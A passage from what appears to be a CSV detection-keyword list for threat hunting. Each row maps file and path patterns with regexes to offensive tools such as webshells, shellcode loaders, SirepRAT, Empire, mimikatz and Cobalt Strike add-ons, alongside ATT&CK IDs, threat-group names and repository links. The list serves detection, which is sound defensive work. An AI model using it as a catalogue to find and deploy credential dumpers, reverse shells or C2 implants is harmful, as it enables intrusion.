C2/post-exploitation framework powered by Python 3 and .NET's DLR. It's the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter).
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in any way.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","11269" "*/silic webshell.jsp*",".{0,1000}\/silic\swebshell\.jsp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11270" "*/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php*",".{0,1000}\/SimAttacker\s\-\sVrsion\s1\.0\.0\s\-\spriv8\s4\sMy\sfriend\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11271" "*/simple_hijacker/*",".{0,1000}\/simple_hijacker\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework.
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","11272" "*/simple-backdoor.php*",".{0,1000}\/simple\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","N/A","10","","N/A","","","","11273" "*/simple-backdoor.php*",".{0,1000}\/simple\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11274" "*/SimpleLoader.cpp*",".{0,1000}\/SimpleLoader\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","11276" "*/SimpleLoader.exe*",".{0,1000}\/SimpleLoader\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","11277"
"*/SimpleNTSyscallFuzzer.git*",".{0,1000}\/SimpleNTSyscallFuzzer\.git.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel syscalls.","T1055.011 - T1218","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","1","N/A","N/A","7","2","145","25","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z","11278" "*/Simple-Reverse-Shell*",".{0,1000}\/Simple\-Reverse\-Shell.{0,1000}","offensive_tool_keyword","Simple-Reverse-Shell","Simple C++ reverse shell without obfuscation to avoid Win 11 defender detection (At the time of publication","T1548 - T1562 - T1027","TA0003 - TA0008","N/A","N/A","C2","https://github.com/tihanyin/Simple-Reverse-Shell/","1","1","N/A","N/A","N/A","10","119","30","2021-12-21T15:51:48Z","2021-12-19T22:16:32Z","11279" "*/SimplyEmail.git*",".{0,1000}\/SimplyEmail\.git.{0,1000}","offensive_tool_keyword","SimplyEmail","SimplyEmail was built around the concept that tools should do something. and do that something well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework.
Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","N/A","5","10","953","228","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z","11280" "*/SimShell 1.0 - Simorgh Security MGZ.php*",".{0,1000}\/SimShell\s1\.0\s\-\sSimorgh\sSecurity\sMGZ\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11281" "*/SingleDose.git*",".{0,1000}\/SingleDose\.git.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","1","N/A","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","11282" "*/S-inject.exe*",".{0,1000}\/S\-inject\.exe.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","1","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","11283" "*/S-inject.git*",".{0,1000}\/S\-inject\.git.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","1","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","11284" "*/S-inject_x64.exe*",".{0,1000}\/S\-inject_x64\.exe.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - 
TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","1","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","11285" "*/S-inject_x86.exe*",".{0,1000}\/S\-inject_x86\.exe.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","1","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","11286" "*/sip-brute.nse*",".{0,1000}\/sip\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11287" "*/sip-call-spoof.nse*",".{0,1000}\/sip\-call\-spoof\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11288" "*/sip-enum-users.nse*",".{0,1000}\/sip\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11289" "*/sip-methods.nse*",".{0,1000}\/sip\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11290" "*/sipvicious.py*",".{0,1000}\/sipvicious\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","11291" "*/Sirep_Command_Payload.bt*",".{0,1000}\/Sirep_Command_Payload\.bt.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","11292" "*/SirepRAT.git*",".{0,1000}\/SirepRAT\.git.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - 
T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","1","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","11293" "*/SirepRAT.py*",".{0,1000}\/SirepRAT\.py.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","1","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","11294" "*/SirepRAT/releases/*",".{0,1000}\/SirepRAT\/releases\/.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","1","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","11295" "*/sish.git*",".{0,1000}\/sish\.git.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","11298" "*/sish/keys*",".{0,1000}\/sish\/keys.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#linux","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","11302" "*/sish/pubkeys*",".{0,1000}\/sish\/pubkeys.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#linux","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","11303" "*/sish/releases/download/*",".{0,1000}\/sish\/releases\/download\/.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","11304" "*/sish/ssl*",".{0,1000}\/sish\/ssl.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#linux","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","11305" "*/sish:latest*",".{0,1000}\/sish\:latest.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","11306" "*/Sitadel.git*",".{0,1000}\/Sitadel\.git.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","1","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","11307" "*/sitadel.log*",".{0,1000}\/sitadel\.log.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","11308" "*/sitadel.py*",".{0,1000}\/sitadel\.py.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","1","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","11309" "*/sites-available/striker*",".{0,1000}\/sites\-available\/striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - 
TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","11310" "*/sites-enabled/striker*",".{0,1000}\/sites\-enabled\/striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","11311" "*/situational_awareness/*.exe",".{0,1000}\/situational_awareness\/.{0,1000}\.exe","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1143","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","11312" "*/situational_awareness/*.ps1",".{0,1000}\/situational_awareness\/.{0,1000}\.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1147","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","11313" "*/skelsec/pypykatz*",".{0,1000}\/skelsec\/pypykatz.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","11314" "*/skypev2-version.nse*",".{0,1000}\/skypev2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11315" "*/sl0p.dll*",".{0,1000}\/sl0p\.dll.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for Windows","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/ASkyeye/win-server2022-UAC-Bypass","1","1","N/A","N/A","9","1","0","1","2024-02-04T00:10:43Z","2021-09-25T03:36:02Z","11316" "*/Slackor.git*",".{0,1000}\/Slackor\.git.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","11317" "*/Slackor.git*",".{0,1000}\/Slackor\.git.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","11318" "*/Slackor/*",".{0,1000}\/Slackor\/.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","11319"
"*/sleep_python_bridge/*",".{0,1000}\/sleep_python_bridge\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","11320" "*/Sleeper/Sleeper.cna*",".{0,1000}\/Sleeper\/Sleeper\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for
Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","11321" "*/sleepmask.cna*",".{0,1000}\/sleepmask\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
